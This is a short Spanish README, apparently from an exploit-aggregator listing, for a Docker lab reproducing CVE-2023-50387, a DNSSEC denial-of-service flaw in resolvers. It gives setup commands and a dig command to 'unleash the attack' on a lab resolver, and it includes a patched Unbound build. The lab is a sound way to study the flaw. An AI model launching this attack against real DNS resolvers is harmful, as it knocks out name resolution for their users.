## https://sploitus.com/exploit?id=CE8366BE-F17D-552A-B1B4-C2DBD31482C0
Repositorio basado en https://github.com/knqyf263/CVE-2023-50387 en el que se hicieron varias modificaciones:
- Añadido resolver-fixed, que tiene una implementación de Unbound en la que se arregla la vulnerabilidad de la que hablamos.
- Creados scripts para la automatización de generación de claves RRSIG.
Para autogenerar los archivos de configuración:
```
./generar.sh
```
Precondiciones: el script está escrito para Linux, hace falta tener instalado python3 y las utilidades dnssec-keygen y dnssec-signzone (en sistemas basados en Debian, en el paquete bind9-utils).
Para activar los dockers:
```
sudo docker-compose up --build
```
Para desatar el ataque:
```
sudo docker compose exec -it attacker dig @10.10.0.3 www.a.test
```